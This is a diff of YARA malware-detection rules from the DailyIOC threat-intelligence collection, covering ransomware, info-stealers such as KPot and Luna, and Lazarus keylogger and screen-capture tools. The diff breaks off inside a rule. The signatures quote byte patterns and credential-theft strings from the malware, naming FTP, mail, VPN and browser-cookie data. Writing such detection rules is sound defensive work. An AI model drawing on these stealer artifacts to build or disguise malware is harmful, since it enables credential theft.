+rule ARKBIRD_SOLG_MAL_Kpot_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect Egregor / Maze ransomware by Maze blocks"
+		description = "Detect KPot stealer (new variant October 2020)"
 		author = "Arkbird_SOLG"
-		id = "03d3ee25-cd0c-573e-beca-e4ff4377da9f"
-		date = "2020-10-29"
-		modified = "2023-11-22"
+		id = "316feeb3-59e5-5d18-9800-db41fabd6cb0"
+		date = "2020-10-17"
+		modified = "2020-10-17"
 		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-31/Ran_Egregor_Oct_2020_1 .yar#L1-L21"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-17/MAL_KPot_Oct_2020_1.yar#L1-L40"
 		license_url = "N/A"
-		logic_hash = "d7d03db002b74d031b725db60e38a46abce564fb090b013aa9ec66376b430000"
+		logic_hash = "20010e8f2d45f904911664edee710f4dca18327c2b80766c253970a50624d13c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		hash1 = "14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4"
-		hash2 = "af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d"
-		hash3 = "42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb"
-		hash4 = "4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345"
+		hash1 = "028ec268176707aadc2cf8e65a28236cbed214f9fd65fc3346ee34e859e50057"
 
 	strings:
-		$x1 = { 45 f4 8b 4d 10 8b 09 0f b7 49 06 39 c8 0f 8d a2 00 00 00 8b 45 e4 83 78 10 00 75 48 8b 45 0c 8b 40 38 89 45 f0 83 7d f0 00 7e 37 31 c0 8b 4d ec 8b 55 e4 03 4a 0c 89 4d e8 8b 4d e8 8b 55 e4 89 4a 08 8b 4d f0 8b 55 e8 89 14 24 c7 44 24 04 00 00 00 00 89 4c 24 08 89 45 d4 e8 9e c6 ff ff 89 45 d0 eb 3a 8b 45 ec 8b 4d e4 03 41 0c 89 45 e8 8b 45 e4 8b 40 10 8b 4d 08 8b 55 e4 03 4a 14 8b 55 e8 89 14 24 89 4c 24 04 89 44 24 08 e8 77 a1 ff ff 8b 4d e8 8b 55 e4 89 4a 08 89 45 cc 8b 45 f4 83 c0 01 89 45 f4 8b 45 e4 83 c0 28 89 45 e4 }
-		$x2 = { 8b 45 f0 83 38 00 0f 86 a0 00 00 00 8b 45 f8 8b 4d f0 03 01 89 45 ec 8b 45 f0 83 c0 08 89 45 e8 c7 45 fc 00 00 00 00 8b 45 fc 8b 4d f0 8b 49 04 83 e9 08 d1 e9 39 c8 73 62 8b 45 e8 0f b7 00 c1 e8 0c 89 45 e0 8b 45 e8 0f b7 00 25 ff 0f 00 00 89 45 dc 8b 45 e0 85 c0 89 45 d0 74 0f eb 00 8b 45 d0 83 e8 03 89 45 cc 74 04 eb 17 eb 17 8b 45 ec 03 45 dc 89 45 e4 8b 45 0c 8b 4d e4 03 01 89 01 eb 02 eb 00 eb 00 8b 45 fc 83 c0 01 89 45 fc 8b 45 e8 83 c0 02 89 45 e8 eb 8c 8b 45 f0 8b 4d f0 03 41 04 89 45 f0 }
-		$x3 = { 8b 45 f0 8b 4d ec 03 01 89 45 e8 8b 45 e8 89 04 24 c7 44 24 04 14 00 00 00 ff 15 38 f0 0b 10 83 ec 08 31 c9 88 ca 83 f8 00 88 55 cf 75 0d 8b 45 e8 83 78 0c 00 0f 95 c1 88 4d cf 8a 45 cf a8 01 75 05 e9 6e 01 00 00 8b 45 f0 8b 4d e8 03 41 0c 89 04 24 ff 15 3c f0 0b 10 83 ec 04 89 45 dc 8b 45 dc b9 ff ff ff ff 39 c8 }
-		$op1 = { 60 8b 7d 08 8b 4d 10 8b 45 0c f3 aa 61 89 45 f0 }
-		$op2 = { 83 7d 08 00 89 45 ec 89 4d e8 89 55 e4 }
-		$op3 = { 89 4d e8 89 55 e4 75 09 c7 45 f0 00 00 00 00 }
-		$op4 = { 75 09 c7 45 f0 00 00 00 00 eb 17 60 }
+		$olds1 = "%s | %s | %s | %s | %s | %s | %s | %d | %s" fullword ascii
+		$olds2 = "%s\\%s\\%s\\%.6s_%d.dat" fullword wide
+		$olds3 = "%s\\%s\\%s-Qt" fullword wide
+		$olds4 = "%s\\%s\\%.6ss" fullword wide
+		$olds5 = "%s\\%s\\%s.vdf" fullword wide
+		$olds6 = "https://%S/a/%S" fullword wide
+		$olds7 = { 4e 00 61 00 6d 00 65 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 43 00 6f 00 6d 00 6d 00 65 00 6e 00 74 00 3a 00 20 00 25 00 6c 00 73 00 0d 00 0a 00 55 00 73 00 65 00 72 00 3a 00 09 00 25 00 6c 00 73 00 0d 00 0a 00 44 00 61 00 74 00 61 00 3a 00 20 00 0d 00 0a 00 00 00 00 00 25 00 32 00 2e 00 32 00 58 00 20 00 00 00 00 00 25 00 2d 00 35 00 30 00 73 00 20 00 25 00 73 }
+		$debug1 = "4|Remote Desktop|%s|%s|%s|" fullword ascii
+		$debug2 = "1|TotalCommander|%s|%s|%s|" fullword ascii
+		$debug3 = "1|FileZilla|%s:%s|%s|%S|" fullword ascii
+		$debug4 = "5|Windows Mail|%s|%s|%s|" fullword ascii
+		$debug5 = "5|Outlook|%s:%d|%s|%s|" fullword ascii
+		$debug6 = "1|WS_FTP|%s|%s|%S|" fullword ascii
+		$debug7 = "1|WinSCP|%s|%s|%s|" fullword ascii
+		$debug8 = "3|Pidgin|%s|%s|%s|" fullword ascii
+		$debug9 = "3|Psi(+)|%s|%s|%s|" fullword ascii
+		$debug10 = "2|EarthVPN||%s|%s|" fullword ascii
+		$debug11 = "2|NordVPN||%s|%s|" fullword ascii
+		$debug12 = "0|%s|%S|%s|%s|%s" fullword ascii
+		$debug13 = "0|%S|%s|%s|%s|%S" fullword ascii
+		$debug14 = "0|%s|%s|%s|%s|" fullword ascii
+		$debug15 = "Masked|%s|%02d/%04d|%s|%s|%s" fullword ascii
+		$op1 = "{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1" fullword ascii
+		$op2 = { 25 73 0d 0a 25 73 0d 0a 56 69 73 69 74 73 20 63 6f 75 6e 74 3a 20 25 64 0d 0a 4c 61 73 74 20 76 69 73 69 74 3a 20 5b 25 64 2d 25 30 32 64 2d 25 30 32 64 20 25 30 32 64 3a 25 30 32 64 3a 25 30 32 64 5d 0d 0a 0d 0a 00 42 72 6f 77 73 65 72 73 5c 48 69 73 74 6f 72 79 5c 25 73 2e 74 78 74 00 42 72 6f 77 73 65 72 73 5c 41 75 74 6f 66 69 6c 6c 5c 25 73 2e 74 78 74 00 00 00 00 42 72 6f 77 73 65 72 73 5c 43 6f 6f 6b 69 65 73 5c 25 73 2e 74 78 74 }
+		$op3 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
+		$op4 = "monero-project" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 350KB and ( 3 of ( $op* ) or 2 of ( $x* ) )
+		uint16( 0 ) == 0x5a4d and filesize > 120KB and 4 of ( $olds* ) and 10 of ( $debug* ) and 2 of ( $op* )
 }
-rule ARKBIRD_SOLG_Exp_CVE_2021_40444_Sep_2021_1 : FILE
+rule ARKBIRD_SOLG_Ran_Crysis_Sep_2020_1 : FILE
 {
 	meta:
-		description = "Detect the maldocs with a structure like used for CVE_2021_40444 exploit"
+		description = "Detect Crysis ransomware"
 		author = "Arkbird_SOLG"
-		id = "acaba73d-f744-5d3f-9617-e976832f3577"
-		date = "2021-09-09"
-		modified = "2021-09-09"
-		reference = "https://github.com/StrangerealIntel/DailyIOC"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-09-09/Exp_CVE_2021_40444_Sep_2021_1.yara#L2-L20"
+		id = "9cc1a1b9-c4a9-5add-833d-81be02ffc4fb"
+		date = "2020-10-16"
+		modified = "2020-10-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Crysis_Sep_2020_1.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "ba1b256c9caad3371d57e6ecbe54721038c819c7c081edf2443523109c25b184"
-		score = 50
-		quality = 75
+		logic_hash = "c7706b862cd0277c8b726d32dc819ad7e15933b28e3a31599922f3dc0beb8348"
+		score = 75
+		quality = 69
 		tags = "FILE"
-		reference1 = "-"
-		hash1 = "199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455"
-		hash2 = "3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf"
-		hash3 = "5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185"
-		hash4 = "938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52"
-		tlp = "White"
-		level = "experimental"
-		adversary = "-"
+		hash1 = "34c485ad11076ede709ff409c0e1867dc50fd40311ae6e7318ddf50679fa4049"
+		hash2 = "4708750c9a6fdeaec5f499a3cd26bb5f61db4f82e66484dc7b44118effbb246f"
+		hash3 = "b565c8e1e81796db13409f37e4bd28877272b5e54ab5c0a3d9b6a024e7f5a039"
+		hash4 = "8e8b6818423930eea073315743b788aef2f41198961946046b7b89042cb3f95a"
 
 	strings:
-		$x1 = { 2f 5f 72 65 6c 73 2f 64 6f 63 75 6d 65 6e 74 2e 78 6d 6c 2e 72 65 6c 73 55 54 09 00 03 [3] 61 [3] 61 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 ?? 94 ?? 4e c2 [3] ef 4d 7c 87 }
-		$x2 = { 77 6d 66 55 54 09 00 03 00 a6 ce 12 00 a6 ce 12 75 78 0b 00 01 04 00 00 00 00 04 00 00 00 00 bb 7e f6 d8 2c 06 38 48 00 93 85 e1 8c 0c 9c 0c 0c cc 52 60 1e 2b 98 64 01 62 66 46 0e 30 8f 9b 09 26 ce 03 66 31 83 55 00 00 50 4b 03 04 ?? 00 00 00 ?? 00 [10] 00 00 [2] 00 00 ?? 00 1c 00 }
+		$s1 = { 6f 25 25 4a 72 2e 2e 5c 24 }
+		$s2 = { 52 53 44 53 25 7e 6d }
+		$s3 = { 78 78 4a 6f 25 25 5c 72 2e 2e 38 24 }
+		$s4 = { 25 65 65 ca af 7a 7a f4 8e ae ae 47 e9 08 08 10 18 ba ba }
+		$s5 = { 58 74 1a 1a 34 2e 1b 1b 36 2d 6e 6e dc b2 5a 5a b4 ee a0 a0 5b fb 52 52 a4 f6 3b 3b 76 4d d6 d6 b7 61 b3 b3 7d ce 29 29 52 7b e3 e3 dd 3e 2f 2f 5e 71 84 84 13 97 53 53 }
+		$s6 = { 3b 32 32 64 56 3a 3a 74 4e 0a 0a 14 1e 49 49 92 db 06 06 0c 0a 24 24 48 6c 5c 5c b8 e4 c2 c2 9f 5d d3 d3 bd 6e ac ac 43 ef 62 62 }
+		$s7 = { 26 4c 6a 26 36 6c 5a 36 3f 7e 41 3f f7 f5 02 f7 cc 83 4f cc 34 68 5c 34 a5 51 f4 a5 e5 d1 34 e5 f1 f9 08 f1 71 e2 93 71 d8 ab 73 d8 31 62 53 31 15 2a 3f 15 04 08 0c 04 c7 95 52 c7 23 46 65 23 }
+		$s8 = { 7e fc 82 7e 3d 7a 47 3d 64 c8 ac 64 5d ba e7 5d 19 32 2b 19 73 e6 95 73 60 c0 a0 60 81 19 98 81 4f 9e d1 4f dc a3 7f dc 22 44 66 22 2a 54 7e 2a 90 3b ab 90 88 0b 83 88 46 8c ca 46 ee c7 29 }
+		$s9 = "sssssbsss" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x4B50 and filesize > 5KB and all of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize > 30KB and all of them
 }
-rule ARKBIRD_SOLG_Backdoor_APT_Nazar_April_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Egregor_Sept_2020_1 : FILE
 {
 	meta:
-		description = "Detect strings used by APT Nazar"
+		description = "Detect Egregor ransomware (variant Sept2020)"
 		author = "Arkbird_SOLG"
-		id = "727a1f4e-1371-5a95-bce9-4a4f701a2ac6"
-		date = "2020-04-29"
-		modified = "2023-11-22"
-		reference = "Internal research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-04-29/Yara_Rule_APT_Bazar-April_2020_1.yar#L3-L29"
+		id = "b44b93ec-b470-511e-b08f-7d83efd30ecc"
+		date = "2020-10-07"
+		modified = "2020-10-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-16/Ran_Egregor_Sept_2020_1.yar#L1-L22"
 		license_url = "N/A"
-		logic_hash = "79028588ac6afd3e3d0d839d10eada9e5382991eebb600b0dae2119bcd7eac93"
+		logic_hash = "4ce7398cc6ad0538735aec6490204122690f029cbb8d20f9efd2f612955f106b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "2fe9b76496a9480273357b6d35c012809bfa3ae8976813a7f5f4959402e3fbb6"
+		hash1 = "4c9e3ffda0e663217638e6192a093bbc23cd9ebfbdf6d2fc683f331beaee0321"
+		hash2 = "aee131ba1bfc4b6fa1961a7336e43d667086ebd2c7ff81029e14b2bf47d9f3a7"
+		hash3 = "3fd510a3b2e0b0802d57cd5b1cac1e61797d50a08b87d9b5243becd9e2f7073f"
+		hash4 = "9c900078cc6061fb7ba038ee5c065a45112665f214361d433fc3906bf288e0eb"
+		hash5 = "a376fd507afe8a1b5d377d18436e5701702109ac9d3e7026d19b65a7d313b332"
 
 	strings:
-		$s1 = "101;0000;" fullword ascii
-		$s2 = "hodll.dll" fullword ascii
-		$s3 = { 70 73 73 64 6B ?? ?? 2E 73 79 73 }
-		$s4 = { 70 73 73 64 6B ?? ?? 2E 76 78 64 }
-		$s5 = "##$$%%&&''(())**++,,--..//0123456789:;<=>?" fullword ascii
-		$s6 = "SYSTEM\\CurrentControlSet\\Services\\VxD\\MSTCP" fullword ascii
-		$s7 = "removehook" fullword ascii
-		$s8 = "installhook" fullword ascii
-		$s9 = "_crt_debugger_hook" fullword ascii
-		$s10 = "\\Files.txt" fullword ascii
-		$s11 = "\\report.txt" fullword ascii
-		$s12 = "\\Programs.txt" fullword ascii
-		$s13 = "\\Devices.txt" fullword ascii
-		$s14 = "\\music.mp3" fullword ascii
-		$s15 = "\\z.png" fullword ascii
+		$x1 = "dmocx.dll" fullword ascii
+		$s2 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
+		$s3 = "M:\\sc\\p\\testbuild.pdb" fullword ascii
+		$s4 = "Type Descriptor'" fullword ascii
+		$s5 = "=$=`=h=p=t=x=|=" fullword ascii
+		$s6 = "--nop" fullword wide
+		$s7 = "9,94989@9X9" fullword ascii
 
 	condition:
-		12 of them and filesize > 120KB
+		uint16( 0 ) == 0x5a4d and filesize > 200KB and 1 of ( $x* ) and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Luna_Stealer_Apr_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Screencapture_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect Luna stealer (also Mercurial Grabber)"
-		author = "Arkbird_SOLG"
-		id = "2fecce99-5869-5de0-afae-6dc245748fa6"
-		date = "2021-08-29"
-		modified = "2021-08-30"
-		reference = "https://github.com/NightfallGT/Mercurial-Grabber"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Luna/MAL_Luna_Stealer_Apr_2021_1.yara#L1-L22"
+		description = "Detect ScreenCapture malware used by Lazarus APT"
+		author = "Arkbird_SOLG, James_inthe_box"
+		id = "bb0463ac-6219-5a12-b3d2-fc82800bda69"
+		date = "2020-06-23"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L3-L31"
 		license_url = "N/A"
-		logic_hash = "934ded815c262fa8bee38638e17ed8c2b1f0dcad28037bf1d525e11bf7e34dce"
+		logic_hash = "66f8d3da0f70f6c4ed6f853ab4040d7f96c043e9e194f1720999b48910b3e756"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18"
-		hash2 = "93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f"
-		hash3 = "0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21"
-		hash4 = "ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a"
-		tlp = "White"
-		adversary = "-"
+		hash1 = "6caa98870efd1097ee13ae9c21c6f6c9202a19ad049a9e65c60fce5c889dc4c8"
 
 	strings:
-		$s1 = { 73 ?? 00 00 0a 0b 07 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 0a 6f ?? 00 00 0a 0c 08 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a 0d 09 6f ?? 00 00 0a 0a 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 06 28 ?? 00 00 06 7d ?? 00 00 04 06 28 ?? 00 00 0a de 0a 07 2c 06 07 6f ?? 00 00 0a dc de 1a 13 04 72 [2] 00 70 11 04 6f ?? 00 00 0a 28 ?? 00 00 0a 28 ?? 00 00 0a de 00 2a }
-		$s2 = { 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0a 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0b 02 06 72 [2] 00 70 07 28 ?? 00 00 0a 7d ?? 00 00 04 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 0c 02 72 [2] 00 70 02 7b ?? 00 00 04 72 [2] 00 70 08 28 ?? 00 00 0a 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 72 [2] 00 70 02 7b ?? 00 00 04 28 ?? 00 00 06 7d ?? 00 00 04 02 7b ?? 00 00 04 28 ?? 00 00 0a 1f 16 63 21 00 b0 ca a2 4a 01 00 00 58 0d 09 28 ?? 00 00 0a 13 05 12 05 28 ?? 00 00 0a 13 04 02 12 04 fe 16 ?? 00 00 01 6f ?? 00 00 0a 7d ?? 00 00 04 2a }
-		$s3 = { 72 [2] 00 70 73 ?? 00 00 0a 0a 06 6f ?? 00 00 0a 6f ?? 00 00 0a 0c 2b 75 08 6f ?? 00 00 0a 74 ?? 00 00 01 0b 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 [2] 00 70 6f ?? 00 00 0a 2c 16 02 07 72 [2] 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 07 72 ?? 19 00 70 6f ?? 00 00 0a 2c 16 02 07 72 ?? 19 00 70 6f ?? 00 00 0a 6f ?? 00 00 0a 7d ?? 00 00 04 08 6f ?? 00 00 0a 2d 83 de 0a 08 2c 06 08 6f ?? 00 00 0a dc 2a }
-		$x1 = "---------------- mercurial grabber ----------------" fullword wide
-		$x2 = { 5c 00 73 00 2a 00 3a 00 5c 00 73 00 2a 00 28 00 22 00 28 00 3f 00 3a 00 5c 00 5c 00 22 00 7c 00 5b 00 5e 00 22 00 5d 00 29 00 2a 00 3f }
-		$x3 = { 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 34 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 36 00 7d 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 32 00 37 00 7d 00 01 1d 6d 00 66 00 61 00 5c 00 2e 00 5b 00 5c 00 77 00 2d 00 5d 00 7b 00 38 00 34 00 7d }
+		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\ScreenCapture_Win32_DllRelease.pdb" fullword ascii
+		$s2 = "CloseHandle ScreenCaptureMutex failure! %d" fullword ascii
+		$s3 = "ScreenCapture_Win32_DllRelease.dll" fullword ascii
+		$s4 = "ScreenCaptureMutex already created! %s\n" fullword ascii
+		$s5 = "Capturing screen...\n" fullword ascii
+		$s6 = "%s\\P%02d%lu.tmp" fullword ascii
+		$s7 = "ScreenCaptureThread finished!" fullword ascii
+		$s8 = "ScreenCaptureThread started!" fullword ascii
+		$s9 = "ScreenCapture start time set to %llu" fullword ascii
+		$s10 = "ScreenCaptureMutex already created! %s\n" fullword ascii
+		$s11 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
+		$s12 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
+		$s13 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
+		$s14 = "[END] ScreenCaptureThread terminated!" fullword ascii
+		$s15 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
+		$s16 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
+		$s17 = "Entered Windows direcotry, skipping..." fullword ascii
+		$s18 = "Found %d entries." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 20KB and 2 of ( $x* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 14 of them
 }
-rule ARKBIRD_SOLG_RAN_Lockfile_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Keylog_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect Lockfile ransomware (unpacked version)"
-		author = "Arkbird_SOLG"
-		id = "4abe2e70-5df9-5c5c-ac11-0c958d5430b7"
-		date = "2021-08-28"
-		modified = "2021-08-29"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-29/Lockfile/RAN_Lockfile_Aug_2021_1.yara#L1-L19"
+		description = "Detect keylog malware used by Lazarus APT"
+		author = "Arkbird_SOLG, James_inthe_box"
+		id = "dd6aae8c-76d1-514d-905e-21472eb9b9b2"
+		date = "2020-06-23"
+		modified = "2021-07-13"
+		reference = "https://twitter.com/GR_CTI/status/1275164880992186371"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-23/APT_Lazarus_Stealer_June_2020_1.yar#L33-L58"
 		license_url = "N/A"
-		logic_hash = "6fc04316b8b4790494a8c88c8435245a051b2757e5936a5ef95cae2f05907b63"
-		score = 50
+		logic_hash = "9a4e17903ad2a7c80651aa8f3d57876d1621be06ba7a683135b11929b232b2fa"
+		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "3303a19789a73fa70a107f8e35a4ce10bb4f6a69ac041a1947481ed8ae99a11c"
-		level = "experimental"
-		adversary = "Lockfile"
+		hash1 = "6d461bf3e3ca68b2d6d850322b79d5e3e647b0d515cb10449935bf6d77d7d5f2"
 
 	strings:
-		$s1 = { 80 32 41 48 8d 52 01 ff c1 81 f9 d1 57 00 00 72 ef 4c 8d 05 78 d4 06 00 33 d2 33 c9 ff 15 06 9a 05 00 48 8b d8 ff 15 0d 9a 05 00 48 8b cb 3d b7 00 00 00 75 14 ff 15 0d 9a 05 00 33 c0 48 81 c4 d0 03 00 00 41 5c 5b 5d c3 4c 89 b4 24 c8 03 00 00 4c 89 bc 24 c0 03 00 00 ff 15 e9 99 05 00 ff }
-		$s2 = "winsta0\\default" fullword ascii
-		$s3 = { 55 56 57 48 8d 6c 24 f0 48 81 ec 10 01 00 00 33 db 48 8b f1 48 89 5c 24 68 48 89 5d 40 48 89 5c 24 60 ff 15 0b a2 05 00 8b c8 89 45 38 48 8d 54 24 68 ff 15 1b a5 05 00 0f 57 c0 8d 7b 30 33 c0 48 89 45 00 48 89 45 98 48 8d 05 d4 db 06 00 0f 11 45 a0 c7 45 a0 68 00 00 00 0f 11 45 b0 48 89 45 b0 0f 11 45 c0 0f 11 45 d0 0f 11 45 e0 0f 11 45 f0 0f 11 45 88 ff 15 17 a2 05 00 4c 8d 44 24 60 ba eb 01 02 00 48 8b c8 ff 15 4c a1 05 00 85 c0 0f 84 10 01 00 00 4c 8d 44 24 70 33 c9 48 8d 15 8e db 06 00 ff 15 28 a1 05 00 85 c0 0f 84 f4 00 00 00 48 8b 44 24 70 44 8d 4b 01 48 8b 4c 24 60 45 33 c0 48 89 44 24 7c ba 00 00 00 02 48 8d 45 40 c7 44 24 78 01 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 c7 45 84 02 00 00 00 ff 15 ef a0 05 00 85 }
-		$s4 = { 48 8d 85 18 03 00 00 40 88 74 24 53 48 89 44 24 30 4c 8d 4c 24 44 48 8b 05 57 04 0c 00 48 8d 15 f0 dd 06 00 48 89 44 24 28 48 8d 8d d0 01 00 00 48 8d 45 b0 4c 8b c3 48 89 44 24 20 e8 13 f3 ff ff 48 89 74 24 30 48 8d 8d d0 01 00 00 c7 44 24 28 80 00 00 00 45 33 c9 45 33 c0 c7 44 24 20 02 00 00 00 ba 00 00 00 c0 ff 15 a6 a3 05 00 44 8b 05 8f fe 07 00 48 8d 4d 88 48 8b f8 e8 23 b5 ff ff 48 83 }
-		$s5 = { 3c 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 25 73 3c 2f 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3e 00 3c 62 6c 6f 63 6b 6e 75 6d 3e 25 64 3c 2f 62 6c 6f 63 6b 6e 75 6d 3e 00 25 73 5c 25 73 2d 25 73 2d 25 64 25 73 }
-		$s6 = { 33 d2 48 8d 8d c0 00 00 00 41 b8 04 01 00 00 e8 48 99 03 00 48 8d 95 10 03 00 00 c7 85 10 03 00 00 04 01 00 00 48 8d 4d b0 ff 15 c5 a5 05 00 4c 8d 45 b0 48 8d 15 2a df 06 00 48 8d 8d c0 00 00 00 e8 96 f4 ff ff 44 8d 46 02 48 8d 15 33 df 06 00 48 8d 4c 24 68 e8 81 f4 ff ff c6 85 18 03 00 00 2f 8b ce c6 85 19 03 00 00 69 c6 85 1a 03 00 00 75 c6 85 1b 03 00 00 62 40 88 b5 1c 03 00 00 0f b6 }
+		$s1 = "E:\\workspace\\VS\\crat_2\\client\\Build\\Win32\\DllRelease\\KeyLog_Win32_DllRelease.pdb" fullword ascii
+		$s2 = "CloseHandle KeyLogMutex failure! %d" fullword ascii
+		$s3 = "KeyLog_Win32_DllRelease.dll" fullword ascii
+		$s4 = "Key Log Mutex already created! %s\n" fullword ascii
+		$s5 = "Unable to GetProcAddress of GetAsyncKeyState" fullword ascii
+		$s6 = "KeyLogThread finished!" fullword ascii
+		$s7 = "KeyLogThread started!" fullword ascii
+		$s8 = "Major=%d, Minor=%d, Build=%d, Arch=%d" fullword ascii
+		$s9 = "Can't create file %s, errno = %d, nCreateRetryCount = %d" fullword ascii
+		$s10 = "ExploreDirectory, csDirectoryPath = %s, dwError=%d" fullword ascii
+		$s11 = "[END] KeyLogThread terminated!" fullword ascii
+		$s12 = { 25 00 2d 00 32 00 30 00 73 00 20 00 20 00 20 00 25 00 31 00 30 00 6c 00 6c 00 75 00 20 00 62 00 79 00 74 00 65 00 73 }
+		$s13 = { 57 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 62 00 79 00 74 00 65 00 73 00 20 00 74 00 6f 00 20 00 66 00 69 00 6c 00 65 00 20 00 25 00 73 }
+		$s14 = "Entered Windows direcotry, skipping..." fullword ascii
+		$s15 = "Found %d entries." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 10KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and 11 of them
 }
-rule ARKBIRD_SOLG_MAL_Kernel_Driver_Aug_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_NK_Lazarus_Stealer_Generic_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect kernel driver used by lockfile group"
-		author = "Arkbird_SOLG"
-		id = "80bf5286-6da6-5380-ad14-345d8122d3d4"
-		date = "2021-08-28"
-		modified = "2021-08-29"
